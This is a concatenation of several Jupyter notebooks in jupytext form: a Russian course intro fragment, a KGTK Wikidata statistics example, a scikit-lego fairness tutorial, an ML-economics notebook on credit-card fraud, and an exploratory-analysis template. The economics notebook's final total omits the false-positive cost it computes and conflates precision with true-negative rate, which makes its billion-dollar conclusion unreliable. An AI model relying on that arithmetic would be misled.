Выше мы вывели на экран именно её. Изучите эту философию и тоже начните её придерживаться. # # Более того, мы рекомендуем вам изучить [стайлгайд по написанию кода PEP 8.](https://pythonworld.ru/osnovy/pep-8-rukovodstvo-po-napisaniyu-koda-na-python.html) В конце курса вас будет ждать домашка с код-ревью. В ней мы будем требовать, чтобы вы придерживались PEP 8. Код должен быть читаемым :) # ## Ваше задание # # - Дорешать все задачи из [первого контеста.](https://official.contest.yandex.ru/contest/24363/enter/) Обратите внимание, что они полностью соответствуют [первой неделе](https://www.coursera.org/learn/python-osnovy-programmirovaniya/home/week/1) рекомендованного вам курса с Coursera. Можно решать их в контесте, можно на курсере. Как вам будет удобнее. Постарайтесь решить хотя бы половину из них. # - В качестве альтернативы вы можете попробовать порешать [похожие задачи с pythontutor](https://pythontutor.ru/lessons/inout_and_arithmetic_operations/) # # Решение этих заданий нами никак не проверяется. Они нужны для практики, чтобы впоследствии вам было легче решать домашние работы и самостоятельные работы. # # > Более того, можно просить разбирать на семинарах и консультациях задачи, которые вы не смогли решить либо не поняли. Об этом можно попросить своего семинариста или ассистентов. # ![](https://raw.githubusercontent.com/FUlyankin/stickers/master/2-itog_stickers/zen.png) #
sem01_intro/sem01_intro.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Example Scenario 2: Validation and statistics on a subset of Wikidata # # *Bob wants to extract a subset of Wikidata with the `member of (P463)` property, clean it, remove irrelevant columns (for this task), and compute its statistics, including centrality metrics.* # ## Preparation (same as in Example 3) # # To run this notebook, Bob would need the Wikidata edges file. We will work with version `20200405` of Wikidata. Presumably, this file is not present on Bob's laptop, so we need to download and unpack it first: # * please download the file [here](https://drive.google.com/file/d/1WIQIYXJC1IdSlPchtqz0NDr2zEEOz-Hb/view?usp=sharing) # * unpack it by running : `gunzip wikidata_edges_20200504.tsv.gz` # # You are all set! # # *Note*: Here we assume that the Wikidata file has already been transformed to KGTK format from Wikidata's `json.bz2` dump. This can be done with the following KGTK command (for demonstration purposes, we will skip this command, as its execution takes around 11 hours): `kgtk import_wikidata -i wikidata-20200504-all.json.bz2 --node wikidata_nodes_20200504.tsv --edge wikidata_edges_20200504.tsv -qual wikidata_qualifiers_20200504.tsv` # ## Implementation in KGTK # # We filter the data for all `P463` relations. # + language="bash" # kgtk filter -p ' ; P463 ; ' wikidata_edges_20200504.tsv > p463.tsv # - # Next, we clean it and remove columns that are not relevant for this use case: # %env ignore_cols=id,rank,node2;magnitude,node2;unit,node2;item,node2;lower,node2;upper,node2;entity-type,node2;longitude,node2;latitude,node2;date,node2;calendar,node2;precision # + language="bash" # kgtk clean_data --error-limit 0 p463.tsv / remove_columns -c "$ignore_cols" | grep . 
> graph.tsv # - # Finally, we compute graph statistics: # + language="bash" # kgtk graph_statistics --directed --degrees --pagerank --log p463_summary.txt graph.tsv > p463_stats.tsv # - # You can now inspect the individual node metrics in `p463_stats` or read the summary in `p463_summary.txt`. # # For example, we learn that the mean degree is 2.45 and that the node with a highest PageRank is ORCID, Inc. (`Q19861084`).
examples/Example2 - Curation and Statistics.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + [markdown] colab_type="text" id="FD2lUW6682_3" # # One Way to Measure Algorithmic Fairness # > as described in the scikit-lego documentation # - toc: true # - badges: true # - comments: true # - categories: [machine learning, algorithmic bias, python] # - author: <NAME> # - image: images/algorithmic_fairness.JPG # - search_exclude: false # - permalink: /algorithmic-fairness # - use_math: true # - # > Tip: The code required to replicate the results described in this article is provided in the ```Show Code``` dropdowns. # <br> # + colab={} colab_type="code" id="VoGwzI1h8m1n" #collapse-hide import numpy as np import pandas as pd import matplotlib.pylab as plt from sklearn.datasets import load_boston from sklearn.pipeline import Pipeline from sklearn.preprocessing import StandardScaler from sklearn.linear_model import LinearRegression from sklearn.metrics import mean_squared_error from sklego.preprocessing import InformationFilter import warnings warnings.filterwarnings('ignore') # - # ## tl;dr # # Scikit-Learn comes with a copy of [UC Irvine's ML housing dataset](https://archive.ics.uci.edu/ml/machine-learning-databases/housing/)--perhaps better known as the Boston housing dataset--which was taken from the StatLib library maintained at Carnegie Mellon University. This dataset contains features like "lower status of population" and "the proportion of blacks by town". Consequently, any model made from this dataset is likely to overfit on Mean Squared Error and underfit on fairness, if one was to apply it. 
Scikit-Lego offers tools to mitigate such fairness issues; a demonstration is provided, along with some discussion of the underpinning mathematical intuition, as originally provided in the [scikit-lego documentation](https://scikit-lego.readthedocs.io/en/latest/). # + [markdown] colab_type="text" id="0AYjzg5P8m1r" # ## Measuring Fairness... # # With a simple pipeline, we can generate a small model and a plot that can convince us that we're doing well. # + colab={} colab_type="code" id="ftuErmm88m1r" outputId="6cd3e6ac-3cf5-4d84-e0ff-6d48f61b74f3" #collapse-hide X, y = load_boston(return_X_y=True) pipe = Pipeline([ ("scale", StandardScaler()), ("model", LinearRegression()) ]) plt.scatter(pipe.fit(X, y).predict(X), y) plt.xlabel("predictions") plt.ylabel("actual") plt.title("Lookin' Good?!") plt.box(False) # + [markdown] colab_type="text" id="Qp1w4rHY8m1y" # We could stop our research here if we think that our Mean Squared Error is "good enough" but this would be dangerous. To find out why, we should look at the variables that are being used in our model. # + colab={} colab_type="code" id="YV1gxEha8m1z" outputId="3491fe2a-751c-4176-92cf-268a7985a7c8" #collapse-hide print(load_boston()['DESCR'][20:1200]) # + [markdown] colab_type="text" id="Jpix47Nr8m13" # This dataset contains features like "% lower status of population" and "the proportion of blacks". Consequently, there's a real possibility that our model will overfit on MSE and underfit on fairness when we want to apply it. Scikit-Lego provides support with respect to fairness issues like this one. # # Dealing with issues such as fairness in machine learning can in general be done in three ways: # # 1. Data preprocessing # 2. Model constraints # 3. Prediction postprocessing # # But before we can dive into methods for getting more fair predictions, we first need to define how to measure fairness. 
# # # ### ...of Regression # # Measuring fairness can be done in many ways but we'll consider one definition: the output of the model is fair with regards to groups $A$ and $B$ if prediction has a distribution independent of group \\(A\\) or \\(B\\). In simpler terms, if group $A$ and $B$ don't get the same predictions: not good. # # Formally, this can be written as: # # <br> # # $$fairness = \left\lvert \frac{1}{|Z_1|} \sum_{i \in Z_1} \hat{y}_{i} - \frac{1}{|Z_0|} \sum_{i \in Z_0} \hat{y}_{i} \right\rvert$$ # # <br> # # where $Z_1$ is the subset of the population where our sensitive attribute is true, and $Z_0$ the subset of the population where the sensitive attribute is false. # # To estimate this we'll use bootstrap sampling to measure the model's bias. # # ### ...of Classification # # A common method for measuring fairness is __demographic parity__[<sup>1</sup>](#fn1), for example through the p-percent metric. # The idea behind it is that it requires that a decision — such as accepting or denying a loan application — be independent of the protected attribute. In other words, we expect the __positive__ rate in both groups to be the same. In the case of a binary decision $\hat{y}$ and a binary protected attribute $z$, this constraint can be formalized by asking that # # <br> # # $$P(\hat{y}=1 | z=0)=P(\hat{y}=1 | z=1)$$ # # <br> # # You can turn this into a metric by calculating how far off this exact equality your decision process is. This metric is called the p% score # # <br> # # $$\text{p% score} = \min \left(\frac{P(\hat{y}=1 | z=1)}{P(\hat{y}=1 | z=0)}, \frac{P(\hat{y}=1 | z=0)}{P(\hat{y}=1 | z=1)}\right)$$ # # <br> # # In other words, membership in a protected class should have no correlation with the decision. 
# # In `sklego` this metric is implemented in `sklego.metrics.p_percent_score` and it works as follows: # # + colab={} colab_type="code" id="2TpQqRRe8m14" outputId="312bd585-d58b-4fc3-cf36-d34f7e38930b" #collapse-show from sklego.metrics import p_percent_score from sklearn.linear_model import LogisticRegression sensitive_classification_dataset = pd.DataFrame({ "x1": [1, 0, 1, 0, 1, 0, 1, 1], "x2": [0, 0, 0, 0, 0, 1, 1, 1], "y": [1, 1, 1, 0, 1, 0, 0, 0] }) X, y = sensitive_classification_dataset.drop(columns='y'), sensitive_classification_dataset['y'] mod_unfair = LogisticRegression(solver='lbfgs').fit(X, y) print('p% score:', p_percent_score(sensitive_column="x2")(mod_unfair, X)) # + [markdown] colab_type="text" id="Hk80Phdk8m17" # Of course, no metric is perfect. If we for example use this in a loan approval situation, the demographic parity only looks at loans given, and not at the rate at which loans are paid back. That might result in a lower percentage of qualified people who are given loans in one population than in another. Another way of measuring fairness could be therefore to measure __equal opportunity__[<sup>2</sup>](#fn2) instead. This constraint would boil down to: # # <br> # # $$P(\hat{y}=1 | z=0, y=1)=P(\hat{y}=1 | z=1, y=1)$$ # # <br> # # and be turned into a metric in the same way as above: # # <br> # # $$\text{equality of opportunity} = \min \left(\frac{P(\hat{y}=1 | z=1, y=1)}{P(\hat{y}=1 | z=0, y=1)}, \frac{P(\hat{y}=1 | z=0, y=1)}{P(\hat{y}=1 | z=1, y=1)}\right)$$ # # <br> # # We can see in the example below that the equal opportunity score does not differ for the models as long as the records where `y_true = 1` are predicted correctly. 
# + colab={} colab_type="code" id="sCgqBYDq8m17" outputId="9ce98f54-c78d-4014-d83e-4134f59b787a" #collapse-show from sklego.metrics import equal_opportunity_score from sklearn.linear_model import LogisticRegression import types sensitive_classification_dataset = pd.DataFrame({ "x1": [1, 0, 1, 0, 1, 0, 1, 1], "x2": [0, 0, 0, 0, 0, 1, 1, 1], "y": [1, 1, 1, 0, 1, 0, 0, 1] }) X, y = sensitive_classification_dataset.drop(columns='y'), sensitive_classification_dataset['y'] mod_1 = types.SimpleNamespace() mod_1.predict = lambda X: np.array([1, 0, 1, 0, 1, 0, 1, 1]) print('equal opportunity score:', equal_opportunity_score(sensitive_column="x2")(mod_1, X, y)) mod_1.predict = lambda X: np.array([1, 0, 1, 0, 1, 0, 0, 1]) print('equal opportunity score:', equal_opportunity_score(sensitive_column="x2")(mod_1, X, y)) mod_1.predict = lambda X: np.array([1, 0, 1, 0, 1, 0, 0, 0]) print('equal opportunity score:', equal_opportunity_score(sensitive_column="x2")(mod_1, X, y)) # + [markdown] colab_type="text" id="sD70gnqN8m1-" # ## Data Preprocessing # When doing data preprocessing we're trying to remove any bias caused by the sensitive variable from the input dataset. By doing this, we remain flexible in our choice of models. # # ### Information Filter # # This is a great opportunity to use the `InformationFilter` which can filter the information of these two sensitive columns away as a transformation step. It does this by projecting all vectors away such that the remaining dataset is orthogonal to the sensitive columns. # # #### How it Works # # The `InformationFilter` uses a variant of the [Gram–Schmidt process](https://en.wikipedia.org/wiki/Gram%E2%80%93Schmidt_process) to filter information out of the dataset. We can make it visual in two dimensions; # # <br> # # ![](../images/projections.png) # # <br> # # To explain what occurs in higher dimensions we need to resort to maths. Take a training matrix $X$ that contains columns $x_1, ..., x_k$. 
If we assume columns $x_1$ and $x_2$ to be the sensitive columns then the information filter will filter out information using this approach; # # <br> # # $$ # \begin{split} # v_1 & = x_1 \\ # v_2 & = x_2 - \frac{x_2 v_1}{v_1 v_1}\\ # v_3 & = x_3 - \frac{x_3 v_1}{v_1 v_1} - \frac{x_3 v_2}{v_2 v_2}\\ # ... \\ # v_k & = x_k - \frac{x_k v_1}{v_1 v_1} - \frac{x_k' v_2}{v_2 v_2} # \end{split} # $$ # # <br> # # Concatenating our vectors and removing the sensitive ones gives us a new training matrix $X_{\text{more fair}} = [v_3, ..., v_k]$. # # ## Experiment # # We will demonstrate the effect of applying this by benchmarking three things: # # 1. Keep $X$ as is. # 2. Drop the two columns that are sensitive. # 3. Use the information filter. # # We'll use the regression metric defined above to show the differences in fairness. # + colab={} colab_type="code" id="OwvWGQ2j8m1_" #collapse-hide X, y = load_boston(return_X_y=True) df = pd.DataFrame(X, columns=['crim','zn','indus','chas','nox', 'rm','age','dis','rad','tax','ptratio', 'b','lstat']) X_drop = df.drop(columns=["lstat", "b"]) X_fair = InformationFilter(["lstat", "b"]).fit_transform(df) X_fair = pd.DataFrame(X_fair, columns=[n for n in df.columns if n not in ['b', 'lstat']]) def simple_mod(): return Pipeline([("scale", StandardScaler()), ("mod", LinearRegression())]) base_mod = simple_mod().fit(X, y) drop_mod = simple_mod().fit(X_drop, y) fair_mod = simple_mod().fit(X_fair, y) base_pred = base_mod.predict(X) drop_pred = drop_mod.predict(X_drop) fair_pred = fair_mod.predict(X_fair) # we're using lstat to select the group to keep things simple selector = df["lstat"] > np.quantile(df["lstat"], 0.5) def bootstrap_means(preds, selector, n=2500, k=25): grp1 = np.random.choice(preds[selector], (n, k)).mean(axis=1) grp2 = np.random.choice(preds[~selector], (n, k)).mean(axis=1) return grp1 - grp2 # + [markdown] colab_type="text" id="BYmGmrZh8m2E" # We can see that the coefficients of the three models are indeed different. 
# + colab={} colab_type="code" id="B5i3jMvc8m2F" outputId="7ed955c3-de31-48ec-8925-8989719c868b" #collapse-hide pd.DataFrame([base_mod.steps[1][1].coef_, drop_mod.steps[1][1].coef_, fair_mod.steps[1][1].coef_], columns=df.columns) # + [markdown] colab_type="text" id="h99s3Rik8m2J" # ### Measuring Fairness of Original Scenario # + colab={} colab_type="code" id="8ZFQLDeu8m2J" outputId="5985f21c-f135-4000-e539-adda76faf698" #collapse-hide plt.figure(figsize=(10, 5)) plt.subplot(121) plt.scatter(base_pred, y) plt.title(f"MSE: {mean_squared_error(y, base_pred)}") plt.box(False) plt.subplot(122) plt.hist(bootstrap_means(base_pred, selector), bins=30, density=True, alpha=0.8) plt.title(f"Fairness Proxy (Original Scenario)") plt.box(False) # + [markdown] colab_type="text" id="J4KB9hD08m2O" # ### Measuring Fairness after Dropping Columns # + colab={} colab_type="code" id="wHBDxfdq8m2P" outputId="fcb5da67-2e32-416e-89e4-146458873200" #collapse-hide plt.figure(figsize=(10, 5)) plt.subplot(121) plt.scatter(drop_pred, y) plt.title(f"MSE: {mean_squared_error(y, drop_pred)}") plt.box(False) plt.subplot(122) plt.hist(bootstrap_means(base_pred, selector), bins=30, density=True, alpha=0.8, label = 'base') plt.hist(bootstrap_means(drop_pred, selector), bins=30, density=True, alpha=0.8, label = 'drop') plt.legend(loc = 'best', shadow=True) plt.title(f"Fairness Proxy (after Dropping Columns)") plt.box(False) # + [markdown] colab_type="text" id="47snKXJH8m2R" # ### Measuring Fairness after Applying Information Filter # + colab={} colab_type="code" id="3MNyx_pW8m2S" outputId="0ee98b5f-54a6-4386-96fb-c35e3d7ef367" #collapse-hide plt.figure(figsize=(10, 5)) plt.subplot(121) plt.scatter(fair_pred, y) plt.title(f"MSE: {mean_squared_error(y, fair_pred)}") plt.box(False) plt.subplot(122) plt.hist(bootstrap_means(base_pred, selector), bins=30, density=True, alpha=0.8, label = 'base') plt.hist(bootstrap_means(fair_pred, selector), bins=30, density=True, alpha=0.8, label = 'fair') plt.legend(loc 
= 'best', shadow = True) plt.title(f"Fairness Proxy") plt.box(False) # + [markdown] colab_type="text" id="rmMyVt1R8m2U" # There definitely is a balance between fairness and model accuracy. Which model you'll use depends on the world you want to create by applying your model. # # Note that you can combine models here to make an ensemble too. You can also use the difference between the 1st and last model as a proxy for bias. # + [markdown] colab_type="text" id="-NNlNPxc8m2V" # ## Model Constraints # # Another way we could tackle this fairness problem would be to explicitly take fairness into account when optimizing the parameters of our model. This is implemented in the `DemographicParityClassifier` as well as the `EqualOpportunityClassifier`. # # Both these models are built as an extension of basic logistic regression. Where logistic regression optimizes the following problem: # # <br> # # $$\begin{array}{cl} # {\operatorname{minimize}} & -\sum_{i=1}^{N} \log p\left(y_{i} | \mathbf{x}_{i},\boldsymbol{\theta}\right) # \end{array} # $$ # # <br> # # We would like to instead optimize this: # # <br> # # $$\begin{array}{cl}{\operatorname{minimize}} & -\sum_{i=1}^{N} \log p\left(y_{i} | \mathbf{x}_{i}, # \boldsymbol{\theta}\right)\\ # {\text { subject to }} & \text{fairness} \geq \mathbf{c}\end{array} $$ # # + [markdown] colab_type="text" id="N_05YRId8m2V" # ## Demographic Parity Classifier # # The p% score discussed above is a nice metric but unfortunately it is rather hard to directly implement in the formulation into our model as it is a non-convex function making it difficult to optimize directly. Also, as the p% rule only depends on which side of the decision boundary an observation lies, it is invariant in small changes in the decision boundary. 
This causes large saddle points in the objective making optimization even more difficult. # # Instead of optimizing for the p% directly, we approximate it by taking the covariance between the users’ sensitive # attributes, $z$, and the decision boundary. This results in the following formulation of our `DemographicParityClassifier`. # # <br> # # $$\begin{array}{cl}{\operatorname{minimize}} & -\sum_{i=1}^{N} \log p\left(y_{i} | \mathbf{x}_{i}, # \boldsymbol{\theta}\right)\\ # {\text { subject to }} & {\frac{1}{N} \sum_{i=1}^{N}\left(\mathbf{z}_{i}-\overline{\mathbf{z}}\right) d_ # \boldsymbol{\theta}\left(\mathbf{x}_{i}\right) \leq \mathbf{c}} \\ # {} & {\frac{1}{N} \sum_{i=1}^{N}\left(\mathbf{z}_{i}-\overline{\mathbf{z}}\right) # d_{\boldsymbol{\theta}}\left(\mathbf{x}_{i}\right) \geq-\mathbf{c}}\end{array} $$ # # <br> # # Let's see what the effect of this is. As this is a Classifier and not a Regressor, we transform the target to a binary variable indicating whether it is above or below the median. Our p% metric also assumes a binary indicator for sensitive columns so we do the same for our `lstat` column. # # Fitting the model is as easy as fitting a normal sklearn model. We just need to supply the columns that should be treated as sensitive to the model, as well as the maximum covariance we want to have. 
# + colab={} colab_type="code" id="fPbqFJHF8m2V" outputId="8be77550-9522-49e1-ce11-b2528fefa258" #collapse-hide from sklego.linear_model import DemographicParityClassifier from sklearn.linear_model import LogisticRegression from sklego.metrics import p_percent_score from sklearn.metrics import accuracy_score, make_scorer from sklearn.model_selection import GridSearchCV df_clf = df.assign(lstat=lambda d: d['lstat'] > np.median(d['lstat'])) y_clf = y > np.median(y) normal_classifier = LogisticRegression(solver='lbfgs') normal_classifier.fit(df_clf, y_clf) fair_classifier = DemographicParityClassifier(sensitive_cols="lstat", covariance_threshold=0.5) fair_classifier.fit(df_clf, y_clf); # + [markdown] colab_type="text" id="2nyuenXf8m2Z" # Comparing the two models on their p% scores also shows that the fair classifier has a much higher fairness score at a slight cost in accuracy. # # We'll compare these two models by doing a gridsearch on the effect of the `covariance_threshold`. # + colab={} colab_type="code" id="Lub0WTik8m2a" #collapse-hide fair_classifier = GridSearchCV(estimator=DemographicParityClassifier(sensitive_cols="lstat", covariance_threshold=0.5), param_grid={"estimator__covariance_threshold": np.linspace(0.01, 1.00, 20)}, cv=5, refit="accuracy_score", return_train_score=True, scoring={"p_percent_score": p_percent_score('lstat'), "accuracy_score": make_scorer(accuracy_score)}) with warnings.catch_warnings(): warnings.simplefilter("ignore") fair_classifier.fit(df_clf, y_clf); pltr = (pd.DataFrame(fair_classifier.cv_results_).set_index("param_estimator__covariance_threshold")) p_score = p_percent_score('lstat')(normal_classifier, df_clf, y_clf) acc_score = accuracy_score(normal_classifier.predict(df_clf), y_clf) # + [markdown] colab_type="text" id="9pKyYfhn8m2c" # The results of the grid search are shown below. Note that the logistic regression results are of the train set, not the test set. 
We can see that the increase in fairness comes at the cost of accuracy but this might literally be a fair tradeoff. # + colab={} colab_type="code" id="DohLR8Sd8m2d" outputId="a45cabdd-c8b9-4731-82fb-efc4506991f8" #collapse-hide plt.figure(figsize=(12, 3)) plt.subplot(121) plt.plot(np.array(pltr.index), pltr['mean_test_p_percent_score'], label='fair classifier') plt.plot(np.linspace(0, 1, 2), [p_score for _ in range(2)], label='logistic regression') plt.xlabel("covariance threshold") plt.legend(loc = 'best', shadow = True) plt.title("p% score") plt.box(False) plt.subplot(122) plt.plot(np.array(pltr.index), pltr['mean_test_accuracy_score'], label='fair classifier') plt.plot(np.linspace(0, 1, 2), [acc_score for _ in range(2)], label='logistic regression') plt.xlabel("covariance threshold") plt.legend(shadow = True) plt.title("accuracy") plt.box(False) # + [markdown] colab_type="text" id="T2J5r1i78m2j" # ## Equal Opportunity # # In the same spirit as the `DemographicParityClassifier` discussed above, there is also an `EqualOpportunityClassifier` which optimizes # # <br> # # $$\begin{array}{cl}{\operatorname{minimize}} & -\sum_{i=1}^{N} \log p\left(y_{i} | \mathbf{x}_{i}, # \boldsymbol{\theta}\right) \\ # {\text { subject to }} & {\frac{1}{POS} \sum_{i=1}^{POS}\left(\mathbf{z}_{i}-\overline{\mathbf{z}}\right) d # \boldsymbol{\theta}\left(\mathbf{x}_{i}\right) \leq \mathbf{c}} \\ # {} & {\frac{1}{POS} \sum_{i=1}^{POS}\left(\mathbf{z}_{i}-\overline{\mathbf{z}}\right) # d_{\boldsymbol{\theta}}\left(\mathbf{x}_{i}\right) \geq-\mathbf{c}}\end{array}$$ # # <br> # # where POS is the subset of the population where `y_true = positive_target`. 
# + colab={} colab_type="code" id="FGEuRKl38m2l" #collapse-hide from sklego.linear_model import EqualOpportunityClassifier fair_classifier = GridSearchCV(estimator=EqualOpportunityClassifier(sensitive_cols="lstat", covariance_threshold=0.5, positive_target=True), param_grid={"estimator__covariance_threshold": np.linspace(0.001, 1.00, 20)}, cv=5, n_jobs=-1, refit="accuracy_score", return_train_score=True, scoring={"p_percent_score": p_percent_score('lstat'), "equal_opportunity_score": equal_opportunity_score('lstat'), "accuracy_score": make_scorer(accuracy_score)}) with warnings.catch_warnings(): warnings.simplefilter("ignore") fair_classifier.fit(df_clf, y_clf); pltr = (pd.DataFrame(fair_classifier.cv_results_).set_index("param_estimator__covariance_threshold")) p_score = p_percent_score('lstat')(normal_classifier, df_clf, y_clf) acc_score = accuracy_score(normal_classifier.predict(df_clf), y_clf) plt.figure(figsize=(12, 3)) plt.subplot(121) plt.plot(np.array(pltr.index), pltr['mean_test_equal_opportunity_score'], label='fair classifier') plt.plot(np.linspace(0, 1, 2), [p_score for _ in range(2)], label='logistic regression') plt.xlabel("covariance threshold") plt.legend(loc = 'best', shadow = True) plt.title("equal opportunity score") plt.box(False) plt.subplot(122) plt.plot(np.array(pltr.index), pltr['mean_test_accuracy_score'], label='fair classifier') plt.plot(np.linspace(0, 1, 2), [acc_score for _ in range(2)], label='logistic regression') plt.xlabel("covariance threshold") plt.legend(loc = 'best', shadow = True) plt.title("accuracy") plt.box(False) # + [markdown] colab_type="text" id="hGLx2Hg18m2q" # ## Sources # # <ol> # <li id="fn1"><NAME> et al. (2017), Fairness Constraints: Mechanisms for Fair Classification</li> # <li id="fn2"><NAME>, <NAME> and <NAME> (2016), Equality of Opportunity in Supervised Learning</li> # </ol> #
_notebooks/2020-05-04-algorithmic-fairness.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: conda_python3
#     language: python
#     name: conda_python3
# ---

# # Machine Learning Economics

# Or, how to evaluate the costs and benefits of a machine learning project proposal in a business setting. There are many types of machine learning that you might want to evaluate: unsupervised clustering, recommendation, anomaly detection, forecasting, etc. Here, we'll focus on classification.

# You will have to assign a quantitative value for each of your model outputs. For classification, those are:
# - False Positives
# - False Negatives
# - True Positives
# - True Negatives
#
# A false positive is when your model incorrectly classifies an object as falling into the positive class. The ground truth is negative, but your model is classifying it as a positive. Think of an example from disease detection. False positives are highly preferable to false negatives there, because the impact of failing to detect an instance of the disease is deleterious to human life. Think, "overzealous detection."
#
# A false negative is the reverse. Your model fails to detect a positive case. You are classifying the event as negative, but the ground truth is actually positive. Think, "failure to detect."
#
# A true positive is when your model correctly predicts a positive case.
#
# A true negative is when your model correctly predicts a negative case.

# ## Business Case

# Now, let's decide on the business case. This is a real scenario from the physical world, and you are going to attempt to build a model that will literally resemble the physical universe. That's certainly a tough task, but with our sophisticated machine learning techniques we are discovering ways of doing this reliably.

# Let's consider credit card fraud. Every day, hundreds of thousands of credit card transactions are placed, and only a tiny fraction of those are fraudulent. 
We need to design a machine learning system capable of detecting that fraud, and we want to make sure that our end result is adding quantitative business value, not detracting from it. # ### Model Outcome Valuation # The true positive in fraudulent credit card transactions is INCREDIBLY high value. Every true positive means you are automatically capturing a potentially fraudlent transaction, saving your customer and yourself a tremendous amount of labor and risk. # Let's assume that, over the course of a year, we're seeing approximate transaction amounts in the following values: # # - 25 dollars for average legitimate transaction amount # - 300 dollars for average fraudulent transaction amount # # For a start, let's just set the value of our model outputs to those average transaction amounts. In reality the cost and benefits are larger, because it's saving you hours of manual labor to handle these cases. We'll consider fraud as the positive case, and normal transactions as the negative case. true_positive = 300 true_negative = 25 # Now, let's look at the false indicators. # overzealous detection # cost to customer and bank of confirming a legitimate transaction false_positive = 50 # failure to detect # cost to customer and bank of failing to detect a fraudulent transaction false_negative = 500 # Given these rough, high-level estimates, let's see what our total year costs are going to be if we assume average transaction amounts of the following. # - 100,000 transactions per day # - 5,000 fraudulent transaction per day total_normal_transactions = 95000 * 365 total_fraudulent_transactions = 5000 * 365 # ## Simulations # Now, let's run a few very lightweight tests to understand the expected costs and values of our machine learning systems. # + # if we catch all fraud expected_value_for_perfect_recall = total_fraudulent_transactions * true_positive print ("Expected value is {}".format(expected_value_for_perfect_recall)) print ("Not bad! That's over $547 million. 
Over half a billion dollars.") # - # if we don't catch any fraud expected_vallue_for_zero_recall = total_fraudulent_transactions * false_negative print ("Expected value is {}".format(expected_vallue_for_zero_recall)) print ("Yikes, that's over $900 million in loss, almost a full billion dollars.") # In reality, the model output is going to be somewhere in the middle. Let's assume that after you train your model and tune it in SageMaker, your best recall is 90%. # + print (expected_value_for_perfect_recall * 0.9) print ("Ok! So we're still saving almost $500M in aggregation.") # - # But there are costs. If our model is missing 10% of the anomalies, that means 10% of the time we're totally failing to detect these. expected_cost = false_negative * total_fraudulent_transactions * .1 print (-expected_cost) expected_value_fraud_capture = expected_value_for_perfect_recall * 0.9 - expected_cost # This means, for the positive class, we're driving revenue over $400 million. Now let's take a look at the negative class, or the legitimate transactions. expected_value_for_perfect_precision = total_normal_transactions * true_negative print (expected_value_for_perfect_precision) # Great! For correctly classifying all of the normal transactions, we're providing almost $900 million in value. In reality we will probably incorrectly classify at least some of those, so let's reset our precision to 90%. expected_value_for_normal = total_normal_transactions * true_negative * 0.9 print (expected_value_for_normal) print ("With 90% precision, we're anticipating providing over $700 million in value!") # There are also costs. For the normal case, this means the cost of the false positive. Let's assume we have a 10% false positive rate. expected_cost_false_positive = total_normal_transactions * false_positive * 0.1 print (-expected_cost_false_positive) # That looks pricy too! Total costs for the false positive at a rate of 10% brings us to just over $150 million. 
Let's sum up the expected value for handling normal cases. total_expected_value_normal = expected_value_for_normal - expected_cost_false_positive print (total_expected_value_normal) # Not bad! Our expected value is positive, which is great. That's over $600 million for the normal case. Let's add up the expected value for both the positive and the negative classes, to see where our project stands as a whole. expected_value_total_project = expected_value_for_normal + expected_value_fraud_capture print (expected_value_total_project) print ("This is great!! We've hit over $1 billion here in anticipated value.")
Starter-Code/Economics of Machine Learning.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # <br><hr id="toc"> # # ### In this module... # # In this module, we'll go through the essential exploratory analysis steps: # 1. [Basic information](#basic) # 2. [Distributions of numeric features](#numeric) # 3. [Distributions of categorical features](#categorical) # 4. [Segmentations](#segmentations) # 5. [Advanced segmentations](#advanced-segmentations) # # # This time, however, you'll be in the driver's seat. # <br><hr> # ### First, let's import libraries and load the dataset. # # In general, it's good practice to keep all of your library imports at the top of your notebook or program. # # <br> # **Starting from this project, we'll have you identify which libraries to import.** # * Up to now, we've taken care of this for you so you could focus on the content. # * However, getting familiar with importing libraries is actually pretty important. # * **Tip:** If you forget one, you can always add it here later and re-run this code block. # # We've provided comments for guidance. # + # NumPy for numerical computing # Pandas for DataFrames pd.set_option('display.max_columns', 100) # Matplotlib for visualization # display plots in the notebook # %matplotlib inline # Seaborn for easier visualization # - # Next, let's import the dataset. # * The file path is <code style="color:crimson">'project_files/employee_data.csv'</code> # + # Load employee data from CSV # - # Now we're ready to jump into exploring the data! # <span id="basic"></span> # # 1. Basic information # # Let's begin by displaying the dataset's basic information. # # <br> # **First, display the <span style="color:royalblue">dimensions</span> (a.k.a. 
shape) of the dataset.** # + # Dataframe dimensions # - # **Next, display the <span style="color:royalblue">datatypes</span> of the features.** # * Which are the **numeric** features? # * Which are the **categorical** features? # + # Column datatypes # - # **Next, display the first 10 <span style="color:royalblue">example observations</span> from the dataset.** # * Remember, the purpose is not to perform rigorous analysis. # * Instead, it's to get a **qualitative "feel"** for the dataset. # + # First 10 rows of data # - # **Finally, display the last 10 rows of data to check for any signs of <span style="color:royalblue">corrupted data</span>.** # * Corrupted data will usually appear as a bunch of gibberish. It will be obvious. # * Most of the time, you won't have corrupted data... but this is still a quick and easy check. # + # Last 10 rows of data # - # <div style="text-align:center; margin: 40px 0 40px 0; font-weight:bold"> # [Back to Contents](#toc) # </div> # <span id="numeric"></span> # # 2. Distributions of numeric features # # One of the most enlightening data exploration tasks is plotting the distributions of your features. # # <br> # **First, plot the Pandas <span style="color:royalblue">histogram grid</span> for all the numeric features.** # # Feel free to mess around with the settings and formatting, but here are the settings we used for reference: # * We made the figure size 10x10 # * We also rotated x-labels by -45 degrees # + # Plot histogram grid # - # **Next, display formal <span style="color:royalblue">summary statistics</span> for the numeric features.** # + # Summarize numerical features # - # <div style="text-align:center; margin: 40px 0 40px 0; font-weight:bold"> # [Back to Contents](#toc) # </div> # <span id="categorical"></span> # # 3. Distributions of categorical features # # Next, let's take a look at the distributions of our categorical features. 
